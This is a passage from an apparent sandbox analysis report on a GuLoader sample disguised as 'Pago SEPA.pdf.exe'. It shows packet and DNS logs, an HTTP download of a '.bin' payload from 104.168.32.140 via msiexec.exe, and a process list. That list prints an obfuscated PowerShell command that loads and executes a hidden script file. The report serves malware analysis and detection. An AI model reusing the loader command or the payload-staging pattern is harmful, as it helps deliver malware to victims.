                                                                    Nov 15, 2024 17:21:04.695441961 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695450068 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695456982 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695471048 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695491076 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695502996 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695524931 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695540905 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695555925 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695569992 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695573092 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695574045 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695585966 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695593119 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695616007 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695631027 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:10.653090954 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:10.658647060 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:10.658706903 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:10.658782959 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:10.664446115 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.502465010 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.502557993 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.502748013 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.502777100 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.502820969 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.502821922 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.503453970 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.503473043 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.503515959 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.503587008 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.504127026 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.504148006 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.504180908 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.504206896 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.504936934 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.504956007 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.505012989 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.505012989 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.505557060 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.505647898 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.507781982 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.507828951 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.507925987 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.507967949 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630247116 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630273104 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630295038 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630331993 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630331993 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630387068 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630760908 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630778074 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.630834103 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.630834103 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.631645918 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.631691933 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.631827116 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.632118940 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.632138014 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.632191896 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.632191896 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.632808924 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.632829905 CET8049967162.55.60.2192.168.2.5
                                                                    Nov 15, 2024 17:21:11.632896900 CET4996780192.168.2.5162.55.60.2
                                                                    Nov 15, 2024 17:21:11.632896900 CET4996780192.168.2.5162.55.60.2

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 15, 2024 17:21:10.614847898 CET6099153192.168.2.51.1.1.1
                                                                    Nov 15, 2024 17:21:10.650446892 CET53609911.1.1.1192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 15, 2024 17:21:10.614847898 CET192.168.2.51.1.1.10x1312Standard query (0)showip.netA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 15, 2024 17:21:10.650446892 CET1.1.1.1192.168.2.50x1312No error (0)showip.net162.55.60.2A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • 104.168.32.140
                                                                    • showip.net

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549928104.168.32.140803668C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 15, 2024 17:21:03.304069042 CET174OUTGET /jUPSCuLd221.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: 104.168.32.140
                                                                    Cache-Control: no-cache
                                                                    Nov 15, 2024 17:21:03.978981018 CET1236INHTTP/1.1 200 OK
                                                                    Content-Type: application/octet-stream
                                                                    Last-Modified: Wed, 13 Nov 2024 21:48:36 GMT
                                                                    Accept-Ranges: bytes
                                                                    ETag: "959be5ca1536db1:0"
                                                                    Server: Microsoft-IIS/10.0
                                                                    Date: Fri, 15 Nov 2024 16:21:03 GMT
                                                                    Content-Length: 393280
                                                                    Data Raw: 02 3c d6 74 97 91 6d fe 5d 01 f7 69 c5 ba f1 64 bf 06 83 e0 28 aa b3 d9 2f 65 6b e2 98 d6 3f 81 ed 12 2e 9f 3b 88 a1 55 95 60 f6 62 16 0b 94 49 70 0a 83 01 19 bd 79 bc 8e f1 6f f1 72 0a 02 2f 1c f4 65 34 00 05 89 04 f1 13 1a 3f 0d cc 5d 65 4c 36 b7 48 c8 59 a3 19 90 e7 f9 23 46 ab a1 d9 14 d0 38 48 73 29 20 52 db a4 21 07 42 e3 8a 02 66 36 28 71 53 f2 6b 5d 45 70 0f 37 c8 a2 c6 9f 33 d6 ea e4 09 2c d1 0e f6 92 72 2c d2 4b 04 c2 7e 1d f4 fc ed d6 70 bd 40 9f e4 22 3a cc 6e e0 1b f6 ef 29 76 50 88 d8 36 f7 32 eb cc 09 06 4a 42 14 35 0b b1 2c 25 cb 32 a8 85 13 71 a7 d4 f4 6c 5f 15 c4 8d bc 2b 35 b5 cb f5 e7 f6 09 53 61 6d c0 67 08 e0 31 a3 b7 fa b4 9d 3a 39 5f b9 07 db e0 b4 3d 9d cc 3b be 14 db 1f f0 ca 20 ec 38 48 ad 75 90 d1 be cd 57 36 b7 f2 05 a6 15 b1 50 d8 29 93 8d 9b 87 c5 26 c5 cb a8 49 55 3a 2d 3e 86 c3 cb d8 ae 6a 9f b3 46 68 d8 48 4c fd ab a1 3b 48 f1 74 07 49 23 c1 53 2f 2b c9 1f 80 a3 c2 5d 8f 2d 5f d7 4e 1f df 21 db 88 b0 27 4b 9a ce 25 11 0f ed 78 7d 57 fb 14 83 50 41 ac 02 e0 1e 13 2b [TRUNCATED]
                                                                    Data Ascii: <tm]id(/ek?.;U`bIpyor/e4?]eL6HY#F8Hs) R!Bf6(qSk]Ep73,r,K~p@":n)vP62JB5,%2ql_+5Samg1:9_=; 8HuW6P)&IU:->jFhHL;HtI#S/+]-_N!'K%x}WPA+Q`&)}962]KqcrQ"z!aS~Za]589P\L2I1[EY;Kfd4)'N?lW?"lv=N6~/\c/IPhdvDo1]!"ao[.`I5F7*I{~5yNv|mOPt~oaXu^F3\HJ0fPcVw|<DO,jjIGBjKL/7)0dt!Rv`AqZuAXlZQx4;/y:~r*V$JdNUdgWf|c2.k$QvZ]/qn,7eHwRk7*\zGCf*O]QwV$%lUGyd4jL?sqbC'g%As
                                                                    Nov 15, 2024 17:21:03.978998899 CET1236INData Raw: ec 1a b1 53 e3 aa 4a aa dc 19 79 c9 1e 8d 65 dd 5e cf 29 c7 4c 08 69 b7 8a 34 48 a9 c6 4e 24 6e c9 53 f3 0d af 18 d4 d3 cf 86 ae 4b c2 0c 2f b2 2e 66 82 8a d5 47 d6 50 86 84 ee 0b 09 16 bd 3a 3d 6c d6 eb 81 cd fd f5 a2 0f ea d9 65 29 d0 20 c6 7f
                                                                    Data Ascii: SJye^)Li4HN$nSK/.fGP:=le) 0{AM'|.mEQs}gx4@@EhjovJu#!;^0LXX`FJ*:$4RwD8MTl0:xK8?@71 qVzD:b
                                                                    Nov 15, 2024 17:21:03.979017019 CET1236INData Raw: cd c8 fb f4 0c 5a b0 61 5d a7 c0 35 87 38 39 92 81 1c a4 db 50 b4 cd 5c 4c 32 9a 8c 06 c2 a7 49 11 31 5b 10 45 7f 8b 59 0f 0e 3b 4b 9c 00 66 64 34 a1 f7 af f2 f7 ce 0f 09 c9 27 4e 1d d8 03 cb e5 3c 6c 57 3f fe 18 8a f4 22 6c 81 ef 76 d1 3d b1 4e
                                                                    Data Ascii: Za]589P\L2I1[EY;Kfd4'N<lW?"lv=N6~\cIPhdvDA1]!!qo;.`4D*I~Ey>v|mOa&qXu~NJ
                                                                    Nov 15, 2024 17:21:03.979032993 CET1236INData Raw: 7f 83 68 65 a7 71 b8 bf 5f 2a 25 1d 9c 6e d6 73 2c fe 15 2a 3d 0d f6 9b 9e b0 d0 46 7d 74 f3 5d 0c 2e e3 cf a1 bd 9f 21 19 83 0c 29 0d c9 4b ca c5 ab 57 ab ed 31 9a 5f 2e ae 23 68 05 df 0b 9f 64 74 d8 fd dd d7 c0 a9 6a 9c c2 02 b9 b4 fd 5f ee ff
                                                                    Data Ascii: heq_*%ns,*=F}t].!)KW1_.#hdtj_VX?k`fqPoR Dy ;#T<L0z|]"5.f>}fXTdAIr[N*&*W<o_Q4?3]e6HY
                                                                    Nov 15, 2024 17:21:03.979052067 CET848INData Raw: 0d 99 2b 06 31 72 bf 90 63 4b 37 54 ad 70 f8 02 d5 6a 1e 1f d4 4f 23 0f 82 63 a9 b7 eb 7b 6a d9 91 47 13 f9 81 93 d1 3d 00 21 aa 0d 8a a6 5d 0d 08 3e f5 a7 c1 fd 3e 91 5b 6f e4 02 89 07 20 29 d3 e9 2c 0e 88 9d cb dc 8a e2 5c 6e eb ca ab 28 d8 c6
                                                                    Data Ascii: +1rcK7TpjO#c{jG=!]>>[o ),\n(ySyv*7Eu2-2*P:aF=7"gx0_*j,94IsAnAE;2CO,K#@5icM)|r! "
                                                                    Nov 15, 2024 17:21:03.979067087 CET1236INData Raw: f8 77 00 86 31 df 3d ed a7 aa 09 a8 2f 83 d7 1a 84 20 1f 5a a7 ea 17 52 23 cc 9f 85 e0 8f 21 ba 33 01 5b 0c f7 cf 6f 68 7a 0c 56 b5 05 f6 16 32 a4 8b 88 54 ac 2a 2f 95 ab 2e 9f bd d3 81 16 b6 79 53 71 f1 2a b4 31 f2 2c 5e 94 7d 7d fc ac 0e 5d 2f
                                                                    Data Ascii: w1=/ ZR#!3[ohzV2T*/.ySq*1,^}}]/)<u8%+vF-tLHb|6Dg!!IF005j5S*<94#!'$%ixJNQ_N!2hR@6
                                                                    Nov 15, 2024 17:21:03.979082108 CET1236INData Raw: 6d 1b 35 e5 9b 62 99 aa 3a fd 3d 01 f6 ef 62 c7 7a cb fc 2a 6e 47 d5 10 e6 4d ab b4 85 30 5d 20 b4 fe c2 2a b2 ad 8f 7b aa 63 a3 25 0d 79 33 d3 2c 0d d5 8c ec 95 31 bd e6 7d 65 1d a3 c1 d5 86 f5 13 4b 63 14 32 a5 46 7d f8 f5 5e 8f c5 c2 85 26 78
                                                                    Data Ascii: m5b:=bz*nGM0] *{c%y3,1}eKc2F}^&x,BBULUIUO^0zQJD:#jMX0Zscv9}p0CITR/[Sb^mA-zrD)#o.182ut/ p8eih~",4YVSO
                                                                    Nov 15, 2024 17:21:03.979178905 CET1236INData Raw: 5e 68 56 1b fe 5a 4a 16 7e 17 97 d8 54 ea b2 7e 57 15 fe 08 ae cb 66 68 31 83 7c 82 fd 21 c2 91 c4 ce 2e 09 ff 6b a4 cd 24 51 e1 d0 d1 0d 98 76 5a 5d 2f d9 de ba 02 f2 4f e0 6e ca f0 6c ea 09 00 37 13 ec a4 dd b3 64 0b ab be 63 3a d7 0a ef 48 d3
                                                                    Data Ascii: ^hVZJ~T~Wfh1|!.k$QvZ]/Onl7dc:HcRkUuizGyM$!Q7Hh]f%.<LCcYv(YQL?sqbC'"%^klXLJ[yZe])JivHN$nS
                                                                    Nov 15, 2024 17:21:03.979193926 CET1236INData Raw: f8 ab 0a ce a9 71 3d bf 25 c5 10 90 92 27 10 91 3c 14 92 03 ff f0 7c a3 6a f8 45 da f1 ef 75 33 6b fc cd 93 8c f5 f2 e6 1c 57 b1 b5 62 6b 93 ab 20 c5 c5 72 2e cc a8 1d a2 79 2e 3e 21 ce fe b1 ae 62 9f b3 46 68 d8 a7 11 bf a4 76 8d 0b f7 72 07 1d
                                                                    Data Ascii: q=%'<|jEu3kWbk r.y.>!bFhvr S))-qJ!LeCxmW4PLPiQ5q&-~59q pGqZQ"y<aYa1~ZAz9F^<ps[
                                                                    Nov 15, 2024 17:21:03.979209900 CET848INData Raw: b5 20 31 cb 84 7b 7e dc 61 d1 83 d7 fd 5b bd d7 7a 0d 5e 25 40 bd c7 33 73 35 f9 89 cc a3 23 b7 9c 0f b9 05 f3 f7 64 f2 89 47 29 3e ac 31 19 34 95 e4 bc 52 ce 91 c5 43 87 4c 49 42 be b0 ea 10 ea 92 a7 83 6e 72 91 af 03 fa a4 36 e4 f1 72 23 fd 87
                                                                    Data Ascii: 1{~a[z^%@3s5#dG)>14RCLIBnr6r#mnyS/Jnn2V)L=pK}`((<X]QWWvm;]bYW-a=M@I}&h]X3_*%3zs,:NRF}t%n
                                                                    Nov 15, 2024 17:21:03.984133959 CET1236INData Raw: 62 7c fe 45 bc b7 22 00 b7 ac 76 78 0b f2 4e 50 25 c0 bf a1 bb 4a cc fb c2 df 8c b2 88 ac 36 7e 05 7f 8f af cb 5c f7 0d f1 20 7f 1e 49 58 b0 68 e8 07 80 fc 5d 35 ee 27 a9 98 1e 06 44 8a b0 c7 f7 41 f5 70 f1 9c 31 ca d5 ae 8b db e2 25 94 21 07 aa
                                                                    Data Ascii: b|E"vxNP%J6~\ IXh]5'DAp1%!qo;F`#X4B*Ir=Ey>v|mOaOg2gL8u~N"EJ0fP V!5?<BO(jjI)8HKLitKQd=aRM5


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549967162.55.60.2803668C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 15, 2024 17:21:10.658782959 CET58OUTGET / HTTP/1.1
                                                                    User-Agent: Project1
                                                                    Host: showip.net
                                                                    Nov 15, 2024 17:21:11.502465010 CET1236INHTTP/1.1 200 OK
                                                                    Access-Control-Allow-Headers: *
                                                                    Access-Control-Allow-Methods: *
                                                                    Access-Control-Allow-Origin: *
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Date: Fri, 15 Nov 2024 16:21:11 GMT
                                                                    Server: Caddy
                                                                    Transfer-Encoding: chunked
                                                                    Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED]
                                                                    Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
                                                                    Nov 15, 2024 17:21:11.502748013 CET1236INData Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f
                                                                    Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;
                                                                    Nov 15, 2024 17:21:11.502777100 CET1236INData Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72
                                                                    Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
                                                                    Nov 15, 2024 17:21:11.503453970 CET1236INData Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20
                                                                    Data Ascii: ge"))||(C()?A("Microsoft Edge"):B("Edg/"))||C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
                                                                    Nov 15, 2024 17:21:11.503473043 CET1236INData Raw: 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 64 3d 48 28 61 29 3b 69 66 28 64 26 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72
                                                                    Data Ascii: ay(a))throw Error();d=H(a);if(d&64)return a;d|=64;if(c&&(d|=512,c!==a[0]))throw Error();a:{c=a;var e=c.length;if(e){var f=e-1,g=c[f];if(N(g)){d|=256;b=(d>>9&1)-1;e=f-b;1024<=e&&(za(c,b,g),e=1023);d=d&-2095105|(e&1023)<<11;break a}}b&&(g=(d>>9&
                                                                    Nov 15, 2024 17:21:11.504127026 CET1236INData Raw: 3d 62 5b 28 77 26 31 35 29 3c 3c 32 7c 68 3e 3e 36 5d 3b 68 3d 62 5b 68 26 36 33 5d 3b 63 5b 65 2b 2b 5d 3d 67 2b 6b 2b 77 2b 68 7d 67 3d 30 3b 68 3d 64 3b 73 77 69 74 63 68 28 61 2e 6c 65 6e 67 74 68 2d 66 29 7b 63 61 73 65 20 32 3a 67 3d 61 5b
                                                                    Data Ascii: =b[(w&15)<<2|h>>6];h=b[h&63];c[e++]=g+k+w+h}g=0;h=d;switch(a.length-f){case 2:g=a[f+1],h=b[(g&15)<<2]||d;case 1:a=a[f],c[e]=b[a>>2]+b[(a&3)<<4|g>>4]+h+d}a=c.join("")}return a}}return a};function Ba(a,b,c){a=Array.prototype.slice.call(a);var d=
                                                                    Nov 15, 2024 17:21:11.504148006 CET1236INData Raw: 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 63 7c 7c 62 26 32 3f 4b 3a 78 61 2c 65 3d 21 21 28 62 26 33 32 29 3b 61 3d 42 61 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e
                                                                    Data Ascii: urn a}}function Ha(a,b,c){var d=c||b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.leng
                                                                    Nov 15, 2024 17:21:11.504936934 CET1236INData Raw: 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 61 28 74 68 69 73 2e 68 2c 46 61 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 2c 21 31 29 3b 72 65 74 75 72 6e 20 50 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 54 2e
                                                                    Data Ascii: toJSON=function(){var a=Ea(this.h,Fa,void 0,void 0,!1,!1);return Pa(this,a,!0)};T.prototype.s=M;T.prototype.toString=function(){return Pa(this,this.h,!1).toString()}; function Pa(a,b,c){var d=a.constructor.v,e=L(J(c?a.h:b)),f=!1;if(d){if
                                                                    Nov 15, 2024 17:21:11.504956007 CET1236INData Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53
                                                                    Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648*Math.random()).toString(36)+Math.abs(Math.floor(2147483648*Math.random())
                                                                    Nov 15, 2024 17:21:11.505557060 CET1236INData Raw: 32 46 74 59 6d 56 79 58 7a 49 30 5a 48 41 75 63 47 35 6e 22 29 2c 61 62 3d 70 2e 61 74 6f 62 28 22 57 57 39 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59
                                                                    Data Ascii: 2FtYmVyXzI0ZHAucG5n"),ab=p.atob("WW91IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVu
                                                                    Nov 15, 2024 17:21:11.507781982 CET1236INData Raw: 2c 22 49 4d 47 22 29 3b 64 2e 63 6c 61 73 73 4e 61 6d 65 3d 55 61 28 29 3b 64 2e 73 72 63 3d 24 61 3b 64 2e 61 6c 74 3d 22 57 61 72 6e 69 6e 67 20 69 63 6f 6e 22 3b 64 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 32 34 70 78 22 3b 64 2e 73 74 79
                                                                    Data Ascii: ,"IMG");d.className=Ua();d.src=$a;d.alt="Warning icon";d.style.height="24px";d.style.width="24px";d.style["padding-right"]="16px";var e=X(a),f=X(a);f.style["font-weight"]="bold";f.textContent=ab;var g=X(a);g.textContent=bb;Y(a,e,f);Y(a,e,g);Y(


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:11:20:03
                                                                    Start date:15/11/2024
                                                                    Path:C:\Users\user\Desktop\Pago SEPA.pdf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Pago SEPA.pdf.exe"
                                                                    Imagebase:0x400000
                                                                    File size:570'654 bytes
                                                                    MD5 hash:B09A414939191D7F43C114C02726DDB9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:11:20:04
                                                                    Start date:15/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)"
                                                                    Imagebase:0xa0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2604236409.000000000BBDF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:11:20:04
                                                                    Start date:15/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
